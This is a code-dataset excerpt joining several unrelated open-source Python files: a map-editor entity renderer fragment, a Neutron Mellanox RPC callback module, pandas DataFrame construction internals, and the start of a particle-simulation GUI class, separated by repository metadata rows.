if i % 10 == 0:
yield
if limitBox and ref.Position not in limitBox:
continue
tilePositions.append(ref.Position)
tiles = self._computeVertices(tilePositions, (0xff, 0xff, 0x33, 0x44), chunkPosition=chunk.chunkPosition)
yield
self.sceneNode = scenegraph.VertexNode(tiles)
class MonsterRenderer(EntityMeshBase):
layer = Layer.Entities # xxx Monsters
notMonsters = {"Item", "XPOrb", "Painting"}
def makeChunkVertices(self, chunk, limitBox):
monsterPositions = []
for i, entityRef in enumerate(chunk.Entities):
if i % 10 == 0:
yield
ID = entityRef.id
if ID in self.notMonsters:
continue
pos = entityRef.Position
if limitBox and pos not in limitBox:
continue
monsterPositions.append(pos)
monsters = self._computeVertices(monsterPositions,
(0xff, 0x22, 0x22, 0x44),
offset=True,
chunkPosition=chunk.chunkPosition)
yield
self.sceneNode = scenegraph.VertexNode(monsters)
class ItemRenderer(EntityMeshBase):
layer = Layer.Items
def makeChunkVertices(self, chunk, limitBox):
entityPositions = []
entityColors = []
colorMap = {
"Item": (0x22, 0xff, 0x22, 0x5f),
"XPOrb": (0x88, 0xff, 0x88, 0x5f),
"Painting": (134, 96, 67, 0x5f),
}
for i, entityRef in enumerate(chunk.Entities):
if i % 10 == 0:
yield
color = colorMap.get(entityRef.id)
if color is None:
continue
pos = entityRef.Position
if limitBox and pos not in limitBox:
continue
entityPositions.append(pos)
entityColors.append(color)
items = self._computeVertices(entityPositions,
numpy.array(entityColors, dtype='uint8')[:, numpy.newaxis, numpy.newaxis],
offset=True, chunkPosition=chunk.chunkPosition)
yield
self.sceneNode = scenegraph.VertexNode(items)
|
bsd-3-clause
| 7,563,492,981,460,571,000
| 33.140496
| 115
| 0.595013
| false
| 4.181174
| false
| false
| false
|
CingHu/neutron-ustack
|
neutron/plugins/mlnx/rpc_callbacks.py
|
1
|
4229
|
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo.config import cfg
from neutron.common import constants as q_const
from neutron.common import rpc as n_rpc
from neutron.db import api as db_api
from neutron.openstack.common import log as logging
from neutron.plugins.mlnx.db import mlnx_db_v2 as db
LOG = logging.getLogger(__name__)
class MlnxRpcCallbacks(n_rpc.RpcCallback):
# History
# 1.1 Support Security Group RPC
# 1.2 Support get_devices_details_list
RPC_API_VERSION = '1.2'
def get_device_details(self, rpc_context, **kwargs):
"""Agent requests device details."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
LOG.debug(_("Device %(device)s details requested from %(agent_id)s"),
{'device': device, 'agent_id': agent_id})
port = self.get_port_from_device(device)
if port:
binding = db.get_network_binding(db_api.get_session(),
port['network_id'])
entry = {'device': device,
'physical_network': binding.physical_network,
'network_type': binding.network_type,
'segmentation_id': binding.segmentation_id,
'network_id': port['network_id'],
'port_mac': port['mac_address'],
'port_id': port['id'],
'admin_state_up': port['admin_state_up']}
if cfg.CONF.AGENT.rpc_support_old_agents:
entry['vlan_id'] = binding.segmentation_id
new_status = (q_const.PORT_STATUS_ACTIVE if port['admin_state_up']
else q_const.PORT_STATUS_DOWN)
if port['status'] != new_status:
db.set_port_status(port['id'], new_status)
else:
entry = {'device': device}
LOG.debug(_("%s can not be found in database"), device)
return entry
def get_devices_details_list(self, rpc_context, **kwargs):
return [
self.get_device_details(
rpc_context,
device=device,
**kwargs
)
for device in kwargs.pop('devices', [])
]
def update_device_down(self, rpc_context, **kwargs):
"""Device no longer exists on agent."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
LOG.debug(_("Device %(device)s no longer exists on %(agent_id)s"),
{'device': device, 'agent_id': agent_id})
port = self.get_port_from_device(device)
if port:
entry = {'device': device,
'exists': True}
if port['status'] != q_const.PORT_STATUS_DOWN:
# Set port status to DOWN
db.set_port_status(port['id'], q_const.PORT_STATUS_DOWN)
else:
entry = {'device': device,
'exists': False}
LOG.debug(_("%s can not be found in database"), device)
return entry
def update_device_up(self, rpc_context, **kwargs):
"""Device is up on agent."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
LOG.debug(_("Device %(device)s up %(agent_id)s"),
{'device': device, 'agent_id': agent_id})
port = self.get_port_from_device(device)
if port:
if port['status'] != q_const.PORT_STATUS_ACTIVE:
# Set port status to ACTIVE
db.set_port_status(port['id'], q_const.PORT_STATUS_ACTIVE)
else:
LOG.debug(_("%s can not be found in database"), device)
|
apache-2.0
| 123,379,875,097,202,480
| 40.460784
| 78
| 0.569402
| false
| 4.031459
| false
| false
| false
|
datapythonista/pandas
|
pandas/core/internals/construction.py
|
1
|
31013
|
"""
Functions for preparing various inputs passed to the DataFrame or Series
constructors before passing them to a BlockManager.
"""
from __future__ import annotations
from collections import abc
from typing import (
TYPE_CHECKING,
Any,
Hashable,
Sequence,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._libs import lib
from pandas._typing import (
ArrayLike,
DtypeObj,
Manager,
)
from pandas.errors import IntCastingNaNError
from pandas.core.dtypes.cast import (
construct_1d_arraylike_from_scalar,
construct_1d_ndarray_preserving_na,
dict_compat,
maybe_cast_to_datetime,
maybe_convert_platform,
maybe_infer_to_datetimelike,
maybe_upcast,
)
from pandas.core.dtypes.common import (
is_1d_only_ea_dtype,
is_datetime64tz_dtype,
is_datetime_or_timedelta_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_named_tuple,
is_object_dtype,
)
from pandas.core.dtypes.dtypes import ExtensionDtype
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeIndex,
ABCIndex,
ABCSeries,
ABCTimedeltaIndex,
)
from pandas.core import (
algorithms,
common as com,
)
from pandas.core.arrays import (
Categorical,
DatetimeArray,
ExtensionArray,
TimedeltaArray,
)
from pandas.core.construction import (
ensure_wrapped_if_datetimelike,
extract_array,
range_to_ndarray,
sanitize_array,
)
from pandas.core.indexes import base as ibase
from pandas.core.indexes.api import (
Index,
ensure_index,
get_objs_combined_axis,
union_indexes,
)
from pandas.core.internals.array_manager import (
ArrayManager,
SingleArrayManager,
)
from pandas.core.internals.blocks import (
ensure_block_shape,
new_block,
)
from pandas.core.internals.managers import (
BlockManager,
SingleBlockManager,
create_block_manager_from_arrays,
create_block_manager_from_blocks,
)
if TYPE_CHECKING:
from numpy.ma.mrecords import MaskedRecords
# ---------------------------------------------------------------------
# BlockManager Interface
def arrays_to_mgr(
arrays,
arr_names,
index,
columns,
*,
dtype: DtypeObj | None = None,
verify_integrity: bool = True,
typ: str | None = None,
consolidate: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
arr_names = ensure_index(arr_names)
if verify_integrity:
# figure out the index, if necessary
if index is None:
index = _extract_index(arrays)
else:
index = ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
else:
index = ensure_index(index)
columns = ensure_index(columns)
# from BlockManager perspective
axes = [columns, index]
if typ == "block":
return create_block_manager_from_arrays(
arrays, arr_names, axes, consolidate=consolidate
)
elif typ == "array":
if len(columns) != len(arrays):
assert len(arrays) == 0
arrays = [np.array([], dtype=object) for _ in range(len(columns))]
return ArrayManager(arrays, [index, columns])
else:
raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
def rec_array_to_mgr(
data: MaskedRecords | np.recarray | np.ndarray,
index,
columns,
dtype: DtypeObj | None,
copy: bool,
typ: str,
):
"""
Extract from a masked rec array and create the manager.
"""
# essentially process a record array then fill it
fdata = ma.getdata(data)
if index is None:
index = _get_names_from_index(fdata)
else:
index = ensure_index(index)
if columns is not None:
columns = ensure_index(columns)
arrays, arr_columns = to_arrays(fdata, columns)
# fill if needed
if isinstance(data, np.ma.MaskedArray):
new_arrays = fill_masked_arrays(data, arr_columns)
else:
# error: Incompatible types in assignment (expression has type
# "List[ExtensionArray]", variable has type "List[ndarray]")
new_arrays = arrays # type: ignore[assignment]
# create the manager
# error: Argument 1 to "reorder_arrays" has incompatible type "List[ndarray]";
# expected "List[ExtensionArray]"
arrays, arr_columns = reorder_arrays(
new_arrays, arr_columns, columns # type: ignore[arg-type]
)
if columns is None:
columns = arr_columns
mgr = arrays_to_mgr(arrays, arr_columns, index, columns, dtype=dtype, typ=typ)
if copy:
mgr = mgr.copy()
return mgr
def fill_masked_arrays(data: MaskedRecords, arr_columns: Index) -> list[np.ndarray]:
"""
Convert numpy MaskedRecords to ensure mask is softened.
"""
new_arrays = []
for col in arr_columns:
arr = data[col]
fv = arr.fill_value
mask = ma.getmaskarray(arr)
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
return new_arrays
def mgr_to_mgr(mgr, typ: str, copy: bool = True):
"""
Convert to specific type of Manager. Does not copy if the type is already
correct. Does not guarantee a copy otherwise. `copy` keyword only controls
whether conversion from Block->ArrayManager copies the 1D arrays.
"""
new_mgr: Manager
if typ == "block":
if isinstance(mgr, BlockManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
new_mgr = arrays_to_mgr(
mgr.arrays, mgr.axes[0], mgr.axes[1], mgr.axes[0], typ="block"
)
else:
new_mgr = SingleBlockManager.from_array(mgr.arrays[0], mgr.index)
elif typ == "array":
if isinstance(mgr, ArrayManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
arrays = [mgr.iget_values(i) for i in range(len(mgr.axes[0]))]
if copy:
arrays = [arr.copy() for arr in arrays]
new_mgr = ArrayManager(arrays, [mgr.axes[1], mgr.axes[0]])
else:
array = mgr.internal_values()
if copy:
array = array.copy()
new_mgr = SingleArrayManager([array], [mgr.index])
else:
raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
return new_mgr
# ---------------------------------------------------------------------
# DataFrame Constructor Interface
def ndarray_to_mgr(
values, index, columns, dtype: DtypeObj | None, copy: bool, typ: str
) -> Manager:
# used in DataFrame.__init__
# input must be a ndarray, list, Series, Index, ExtensionArray
if isinstance(values, ABCSeries):
if columns is None:
if values.name is not None:
columns = Index([values.name])
if index is None:
index = values.index
else:
values = values.reindex(index)
# zero len case (GH #2234)
if not len(values) and columns is not None and len(columns):
values = np.empty((0, 1), dtype=object)
vdtype = getattr(values, "dtype", None)
if is_1d_only_ea_dtype(vdtype) or isinstance(dtype, ExtensionDtype):
# GH#19157
if isinstance(values, np.ndarray) and values.ndim > 1:
# GH#12513 a EA dtype passed with a 2D array, split into
# multiple EAs that view the values
values = [values[:, n] for n in range(values.shape[1])]
else:
values = [values]
if columns is None:
columns = Index(range(len(values)))
return arrays_to_mgr(values, columns, index, columns, dtype=dtype, typ=typ)
if is_extension_array_dtype(vdtype) and not is_1d_only_ea_dtype(vdtype):
# i.e. Datetime64TZ
values = extract_array(values, extract_numpy=True)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape(-1, 1)
else:
# by definition an array here
# the dtypes will be coerced to a single dtype
values = _prep_ndarray(values, copy=copy)
if dtype is not None and not is_dtype_equal(values.dtype, dtype):
shape = values.shape
flat = values.ravel()
if not is_integer_dtype(dtype):
# TODO: skipping integer_dtype is needed to keep the tests passing,
# not clear it is correct
# Note: we really only need _try_cast, but keeping to exposed funcs
values = sanitize_array(
flat, None, dtype=dtype, copy=copy, raise_cast_failure=True
)
else:
try:
values = construct_1d_ndarray_preserving_na(
flat, dtype=dtype, copy=False
)
except IntCastingNaNError:
# following Series, we ignore the dtype and retain floating
# values instead of casting nans to meaningless ints
pass
values = values.reshape(shape)
# _prep_ndarray ensures that values.ndim == 2 at this point
index, columns = _get_axes(
values.shape[0], values.shape[1], index=index, columns=columns
)
_check_values_indices_shape_match(values, index, columns)
if typ == "array":
if issubclass(values.dtype.type, str):
values = np.array(values, dtype=object)
if dtype is None and is_object_dtype(values.dtype):
arrays = [
ensure_wrapped_if_datetimelike(
maybe_infer_to_datetimelike(values[:, i].copy())
)
for i in range(values.shape[1])
]
else:
if is_datetime_or_timedelta_dtype(values.dtype):
values = ensure_wrapped_if_datetimelike(values)
arrays = [values[:, i].copy() for i in range(values.shape[1])]
return ArrayManager(arrays, [index, columns], verify_integrity=False)
values = values.T
# if we don't have a dtype specified, then try to convert objects
# on the entire block; this is to convert if we have datetimelike's
# embedded in an object type
if dtype is None and is_object_dtype(values.dtype):
if values.ndim == 2 and values.shape[0] != 1:
# transpose and separate blocks
dtlike_vals = [maybe_infer_to_datetimelike(row) for row in values]
dvals_list = [ensure_block_shape(dval, 2) for dval in dtlike_vals]
# TODO: What about re-joining object columns?
block_values = [
new_block(dvals_list[n], placement=n, ndim=2)
for n in range(len(dvals_list))
]
else:
datelike_vals = maybe_infer_to_datetimelike(values)
nb = new_block(datelike_vals, placement=slice(len(columns)), ndim=2)
block_values = [nb]
else:
nb = new_block(values, placement=slice(len(columns)), ndim=2)
block_values = [nb]
if len(columns) == 0:
block_values = []
return create_block_manager_from_blocks(block_values, [columns, index])
def _check_values_indices_shape_match(
values: np.ndarray, index: Index, columns: Index
) -> None:
"""
Check that the shape implied by our axes matches the actual shape of the
data.
"""
if values.shape[1] != len(columns) or values.shape[0] != len(index):
# Could let this raise in Block constructor, but we get a more
# helpful exception message this way.
if values.shape[0] == 0:
raise ValueError("Empty data passed with indices specified.")
passed = values.shape
implied = (len(index), len(columns))
raise ValueError(f"Shape of passed values is {passed}, indices imply {implied}")
def dict_to_mgr(
data: dict,
index,
columns,
*,
dtype: DtypeObj | None = None,
typ: str = "block",
copy: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
Used in DataFrame.__init__
"""
arrays: Sequence[Any] | Series
if columns is not None:
from pandas.core.series import Series
arrays = Series(data, index=columns, dtype=object)
data_names = arrays.index
missing = arrays.isna()
if index is None:
# GH10856
# raise ValueError if only scalars in dict
index = _extract_index(arrays[~missing])
else:
index = ensure_index(index)
# no obvious "empty" int column
if missing.any() and not is_integer_dtype(dtype):
nan_dtype: DtypeObj
if dtype is None or (
isinstance(dtype, np.dtype) and np.issubdtype(dtype, np.flexible)
):
# GH#1783
nan_dtype = np.dtype("object")
else:
nan_dtype = dtype
val = construct_1d_arraylike_from_scalar(np.nan, len(index), nan_dtype)
arrays.loc[missing] = [val] * missing.sum()
arrays = list(arrays)
else:
keys = list(data.keys())
columns = data_names = Index(keys)
arrays = [com.maybe_iterable_to_list(data[k]) for k in keys]
# GH#24096 need copy to be deep for datetime64tz case
# TODO: See if we can avoid these copies
arrays = [arr if not isinstance(arr, ABCIndex) else arr._data for arr in arrays]
arrays = [
arr if not is_datetime64tz_dtype(arr) else arr.copy() for arr in arrays
]
if copy:
# arrays_to_mgr (via form_blocks) won't make copies for EAs
# dtype attr check to exclude EADtype-castable strs
arrays = [
x
if not hasattr(x, "dtype") or not isinstance(x.dtype, ExtensionDtype)
else x.copy()
for x in arrays
]
# TODO: can we get rid of the dt64tz special case above?
return arrays_to_mgr(
arrays, data_names, index, columns, dtype=dtype, typ=typ, consolidate=copy
)
def nested_data_to_arrays(
data: Sequence,
columns: Index | None,
index: Index | None,
dtype: DtypeObj | None,
):
"""
Convert a single sequence of arrays to multiple arrays.
"""
# By the time we get here we have already checked treat_as_nested(data)
if is_named_tuple(data[0]) and columns is None:
columns = ensure_index(data[0]._fields)
arrays, columns = to_arrays(data, columns, dtype=dtype)
columns = ensure_index(columns)
if index is None:
if isinstance(data[0], ABCSeries):
index = _get_names_from_index(data)
elif isinstance(data[0], Categorical):
# GH#38845 hit in test_constructor_categorical
index = ibase.default_index(len(data[0]))
else:
index = ibase.default_index(len(data))
return arrays, columns, index
def treat_as_nested(data) -> bool:
"""
Check if we should use nested_data_to_arrays.
"""
return (
len(data) > 0
and is_list_like(data[0])
and getattr(data[0], "ndim", 1) == 1
and not (isinstance(data, ExtensionArray) and data.ndim == 2)
)
# ---------------------------------------------------------------------
def _prep_ndarray(values, copy: bool = True) -> np.ndarray:
if isinstance(values, TimedeltaArray) or (
isinstance(values, DatetimeArray) and values.tz is None
):
# On older numpy, np.asarray below apparently does not call __array__,
# so nanoseconds get dropped.
values = values._ndarray
if not isinstance(values, (np.ndarray, ABCSeries, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
elif isinstance(values, range):
arr = range_to_ndarray(values)
return arr[..., np.newaxis]
def convert(v):
if not is_list_like(v) or isinstance(v, ABCDataFrame):
return v
elif not hasattr(v, "dtype") and not isinstance(v, (list, tuple, range)):
# TODO: should we cast these to list?
return v
v = extract_array(v, extract_numpy=True)
res = maybe_convert_platform(v)
return res
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
if is_list_like(values[0]):
values = np.array([convert(v) for v in values])
elif isinstance(values[0], np.ndarray) and values[0].ndim == 0:
# GH#21861
values = np.array([convert(v) for v in values])
else:
values = convert(values)
else:
# drop subclass info
values = np.array(values, copy=copy)
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError(f"Must pass 2-d input. shape={values.shape}")
return values
def _homogenize(data, index: Index, dtype: DtypeObj | None):
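    # Align each column to `index`: Series are reindexed, dicts are spread
    # over the index with fast_multiget, and every value passes through
    # sanitize_array so the columns share the requested dtype.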
oindex = None
homogenized = []
for val in data:
if isinstance(val, ABCSeries):
if dtype is not None:
val = val.astype(dtype)
if val.index is not index:
# Forces alignment. No need to copy data since we
# are putting it into an ndarray later
val = val.reindex(index, copy=False)
# TODO extract_array should be preferred, but that gives failures for
# `extension/test_numpy.py` (extract_array will convert numpy arrays
# to PandasArray), see https://github.com/pandas-dev/pandas/issues/40021
# val = extract_array(val, extract_numpy=True)
val = val._values
else:
if isinstance(val, dict):
if oindex is None:
oindex = index.astype("O")
if isinstance(index, (ABCDatetimeIndex, ABCTimedeltaIndex)):
val = dict_compat(val)
else:
val = dict(val)
val = lib.fast_multiget(val, oindex._values, default=np.nan)
val = sanitize_array(
val, index, dtype=dtype, copy=False, raise_cast_failure=False
)
homogenized.append(val)
return homogenized
def _extract_index(data) -> Index:
"""
Try to infer an Index from the passed data, raise ValueError on failure.
"""
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
indexes: list[list[Hashable] | Index] = []
have_raw_arrays = False
have_series = False
have_dicts = False
for val in data:
if isinstance(val, ABCSeries):
have_series = True
indexes.append(val.index)
elif isinstance(val, dict):
have_dicts = True
indexes.append(list(val.keys()))
elif is_list_like(val) and getattr(val, "ndim", 1) == 1:
have_raw_arrays = True
raw_lengths.append(len(val))
if not indexes and not raw_lengths:
raise ValueError("If using all scalar values, you must pass an index")
if have_series:
index = union_indexes(indexes)
elif have_dicts:
index = union_indexes(indexes, sort=False)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError("All arrays must be of the same length")
if have_dicts:
raise ValueError(
"Mixing dicts with non-Series may lead to ambiguous ordering."
)
if have_series:
assert index is not None # for mypy
if lengths[0] != len(index):
msg = (
f"array length {lengths[0]} does not match index "
f"length {len(index)}"
)
raise ValueError(msg)
else:
index = ibase.default_index(lengths[0])
# error: Argument 1 to "ensure_index" has incompatible type "Optional[Index]";
# expected "Union[Union[Union[ExtensionArray, ndarray], Index, Series],
# Sequence[Any]]"
return ensure_index(index) # type: ignore[arg-type]
def reorder_arrays(
arrays: list[ArrayLike], arr_columns: Index, columns: Index | None
) -> tuple[list[ArrayLike], Index]:
# reorder according to the columns
if columns is not None and len(columns) and len(arr_columns):
indexer = ensure_index(arr_columns).get_indexer(columns)
arr_columns = ensure_index([arr_columns[i] for i in indexer])
arrays = [arrays[i] for i in indexer]
return arrays, arr_columns
def _get_names_from_index(data) -> Index:
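    # Build an index from the Series names, labelling nameless entries
    # "Unnamed 0", "Unnamed 1", ... in order of appearance.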
has_some_name = any(getattr(s, "name", None) is not None for s in data)
if not has_some_name:
return ibase.default_index(len(data))
index: list[Hashable] = list(range(len(data)))
count = 0
for i, s in enumerate(data):
n = getattr(s, "name", None)
if n is not None:
index[i] = n
else:
index[i] = f"Unnamed {count}"
count += 1
return Index(index)
def _get_axes(
N: int, K: int, index: Index | None, columns: Index | None
) -> tuple[Index, Index]:
# helper to create the axes as indexes
# return axes or defaults
if index is None:
index = ibase.default_index(N)
else:
index = ensure_index(index)
if columns is None:
columns = ibase.default_index(K)
else:
columns = ensure_index(columns)
return index, columns
def dataclasses_to_dicts(data):
"""
Converts a list of dataclass instances to a list of dictionaries.
Parameters
----------
data : List[Type[dataclass]]
    Returns
    -------
    list_dict : List[dict]
    Examples
    --------
    >>> from dataclasses import dataclass
    >>> @dataclass
    ... class Point:
    ...     x: int
    ...     y: int
    >>> dataclasses_to_dicts([Point(1, 2), Point(2, 3)])
    [{'x': 1, 'y': 2}, {'x': 2, 'y': 3}]
"""
from dataclasses import asdict
return list(map(asdict, data))
# ---------------------------------------------------------------------
# Conversion of Inputs to Arrays
def to_arrays(
data, columns: Index | None, dtype: DtypeObj | None = None
) -> tuple[list[ArrayLike], Index]:
"""
Return list of arrays, columns.
"""
if isinstance(data, ABCDataFrame):
if columns is not None:
arrays = [
data._ixs(i, axis=1).values
for i, col in enumerate(data.columns)
if col in columns
]
else:
columns = data.columns
arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
return arrays, columns
if not len(data):
if isinstance(data, np.ndarray):
if data.dtype.names is not None:
# i.e. numpy structured array
columns = ensure_index(data.dtype.names)
arrays = [data[name] for name in columns]
return arrays, columns
return [], ensure_index([])
elif isinstance(data[0], Categorical):
# GH#38845 deprecate special case
warnings.warn(
"The behavior of DataFrame([categorical, ...]) is deprecated and "
"in a future version will be changed to match the behavior of "
"DataFrame([any_listlike, ...]). "
"To retain the old behavior, pass as a dictionary "
"DataFrame({col: categorical, ..})",
FutureWarning,
stacklevel=4,
)
if columns is None:
columns = ibase.default_index(len(data))
return data, columns
elif isinstance(data, np.ndarray) and data.dtype.names is not None:
# e.g. recarray
columns = Index(list(data.dtype.names))
arrays = [data[k] for k in columns]
return arrays, columns
if isinstance(data[0], (list, tuple)):
arr = _list_to_arrays(data)
elif isinstance(data[0], abc.Mapping):
arr, columns = _list_of_dict_to_arrays(data, columns)
elif isinstance(data[0], ABCSeries):
arr, columns = _list_of_series_to_arrays(data, columns)
else:
# last ditch effort
data = [tuple(x) for x in data]
arr = _list_to_arrays(data)
content, columns = _finalize_columns_and_data(arr, columns, dtype)
return content, columns
def _list_to_arrays(data: list[tuple | list]) -> np.ndarray:
# Returned np.ndarray has ndim = 2
    # Note: we already check len(data) > 0 before getting here
if isinstance(data[0], tuple):
content = lib.to_object_array_tuples(data)
else:
# list of lists
content = lib.to_object_array(data)
return content
def _list_of_series_to_arrays(
data: list,
columns: Index | None,
) -> tuple[np.ndarray, Index]:
# returned np.ndarray has ndim == 2
if columns is None:
# We know pass_data is non-empty because data[0] is a Series
pass_data = [x for x in data if isinstance(x, (ABCSeries, ABCDataFrame))]
columns = get_objs_combined_axis(pass_data, sort=False)
indexer_cache: dict[int, np.ndarray] = {}
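    # Cache indexers by id(index) so Series sharing the same index object
    # are aligned against `columns` only once.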
aligned_values = []
for s in data:
index = getattr(s, "index", None)
if index is None:
index = ibase.default_index(len(s))
if id(index) in indexer_cache:
indexer = indexer_cache[id(index)]
else:
indexer = indexer_cache[id(index)] = index.get_indexer(columns)
values = extract_array(s, extract_numpy=True)
aligned_values.append(algorithms.take_nd(values, indexer))
# error: Argument 1 to "vstack" has incompatible type "List[ExtensionArray]";
# expected "Sequence[Union[Union[int, float, complex, str, bytes, generic],
# Sequence[Union[int, float, complex, str, bytes, generic]],
# Sequence[Sequence[Any]], _SupportsArray]]"
content = np.vstack(aligned_values) # type: ignore[arg-type]
return content, columns
def _list_of_dict_to_arrays(
data: list[dict],
columns: Index | None,
) -> tuple[np.ndarray, Index]:
"""
Convert list of dicts to numpy arrays
if `columns` is not passed, column names are inferred from the records
- for OrderedDict and dicts, the column names match
the key insertion-order from the first record to the last.
- For other kinds of dict-likes, the keys are lexically sorted.
Parameters
----------
data : iterable
collection of records (OrderedDict, dict)
columns: iterables or None
Returns
-------
content : np.ndarray[object, ndim=2]
columns : Index
"""
if columns is None:
gen = (list(x.keys()) for x in data)
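        # plain dicts preserve insertion order, so the inferred keys are
        # only sorted when some records are other kinds of mappings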
sort = not any(isinstance(d, dict) for d in data)
pre_cols = lib.fast_unique_multiple_list_gen(gen, sort=sort)
columns = ensure_index(pre_cols)
# assure that they are of the base dict class and not of derived
# classes
data = [(type(d) is dict) and d or dict(d) for d in data]
content = lib.dicts_to_array(data, list(columns))
return content, columns
def _finalize_columns_and_data(
content: np.ndarray, # ndim == 2
columns: Index | None,
dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index]:
"""
Ensure we have valid columns, cast object dtypes if possible.
"""
contents = list(content.T)
try:
columns = _validate_or_indexify_columns(contents, columns)
except AssertionError as err:
# GH#26429 do not raise user-facing AssertionError
raise ValueError(err) from err
if len(contents) and contents[0].dtype == np.object_:
contents = _convert_object_array(contents, dtype=dtype)
return contents, columns
def _validate_or_indexify_columns(
content: list[np.ndarray], columns: Index | None
) -> Index:
"""
If columns is None, make numbers as column names; Otherwise, validate that
columns have valid length.
Parameters
----------
content : list of np.ndarrays
columns : Index or None
Returns
-------
Index
If columns is None, assign positional column index value as columns.
Raises
------
1. AssertionError when content is not composed of list of lists, and if
length of columns is not equal to length of content.
2. ValueError when content is list of lists, but length of each sub-list
is not equal
3. ValueError when content is list of lists, but length of sub-list is
not equal to length of content
"""
if columns is None:
columns = ibase.default_index(len(content))
else:
# Add mask for data which is composed of list of lists
is_mi_list = isinstance(columns, list) and all(
isinstance(col, list) for col in columns
)
if not is_mi_list and len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError(
f"{len(columns)} columns passed, passed data had "
f"{len(content)} columns"
)
elif is_mi_list:
# check if nested list column, length of each sub-list should be equal
if len({len(col) for col in columns}) > 1:
raise ValueError(
"Length of columns passed for MultiIndex columns is different"
)
# if columns is not empty and length of sublist is not equal to content
elif columns and len(columns[0]) != len(content):
raise ValueError(
f"{len(columns[0])} columns passed, passed data had "
f"{len(content)} columns"
)
return columns
def _convert_object_array(
content: list[np.ndarray], dtype: DtypeObj | None
) -> list[ArrayLike]:
"""
Internal function to convert object array.
Parameters
----------
content: List[np.ndarray]
dtype: np.dtype or ExtensionDtype
Returns
-------
List[ArrayLike]
"""
# provide soft conversion of object dtypes
def convert(arr):
if dtype != np.dtype("O"):
arr = lib.maybe_convert_objects(arr)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays
|
bsd-3-clause
| -271,554,817,022,136,300
| 30.013
| 88
| 0.585077
| false
| 3.960286
| false
| false
| false
|
christophercrouzet/hienoi
|
hienoi/gui.py
|
1
|
20220
|
"""Graphical user interface."""
import collections
import ctypes
import sdl2
import hienoi.renderer
from hienoi._common import GLProfile, GraphicsAPI, ParticleDisplay, UserData
from hienoi._vectors import Vector2i, Vector2f, Vector4f
class NavigationAction(object):
"""Enumerator for the current nagivation action.
Attributes
----------
NONE
MOVE
ZOOM
"""
NONE = 0
MOVE = 1
ZOOM = 2
_Handles = collections.namedtuple(
'_Handles', (
'window',
'renderer',
))
_GLHandles = collections.namedtuple(
'_GLHandles', (
'context',
))
_RGBMasks = collections.namedtuple(
'_RGBMasks', (
'red',
'green',
'blue',
))
_FIT_VIEW_REL_PADDING = 2.0
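# The RGB channel masks handed to SDL depend on the platform byte order.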
if sdl2.SDL_BYTEORDER == sdl2.SDL_LIL_ENDIAN:
_RGB_MASKS = _RGBMasks(red=0x000000FF, green=0x0000FF00, blue=0x00FF0000)
else:
_RGB_MASKS = _RGBMasks(red=0x00FF0000, green=0x0000FF00, blue=0x000000FF)
class GUI(object):
"""GUI.
Parameters
----------
window_title : str
Title for the window.
window_position : hienoi.Vector2i
Initial window position.
window_size : hienoi.Vector2i
Initial window size.
window_flags : int
SDL2 window flags.
view_aperture_x : float
Initial length in world units to be shown on the X axis.
view_zoom_range : hienoi.Vector2f
Zoom value range for the view.
mouse_wheel_step : float
Coefficient value for each mouse wheel step.
grid_density : float
See :attr:`GUI.grid_density`.
grid_adaptive_threshold : float
See :attr:`GUI.grid_adaptive_threshold`.
show_grid : bool
See :attr:`GUI.show_grid`.
background_color : hienoi.Vector4f
See :attr:`GUI.background_color`.
grid_color : hienoi.Vector4f
See :attr:`GUI.grid_color`.
grid_origin_color : hienoi.Vector4f
See :attr:`GUI.grid_origin_color`.
particle_display : int
See :attr:`GUI.particle_display`.
point_size : int
See :attr:`GUI.point_size`.
edge_feather : float
See :attr:`GUI.edge_feather`.
stroke_width : float
See :attr:`GUI.stroke_width`.
initialize_callback : function
Callback function to initialize any GUI state.
It takes a single argument ``gui``, an instance of this class.
on_event_callback : function
Callback function ran during the event polling.
It takes 3 arguments: ``gui``, an instance of this class,
``data``, some data to pass back and forth between the caller and this
callback function, and ``event``, the event fired.
renderer : dict
Keyword arguments for the configuration of the renderer. See the
parameters for the class :class:`hienoi.renderer.Renderer`.
Attributes
----------
view_position : hienoi.Vector2f
Position of the view (camera).
view_zoom : float
Current zoom value for the view.
grid_density : float
Density of the grid.
A density of 10.0 means that there are around 10 grid divisions
displayed on the X axis. A grid division unit represents a fixed length
in world units, meaning that the actual grid density changes depending
on the view's zoom.
show_grid : bool
True to show the grid.
background_color : hienoi.Vector4f
Color for the background.
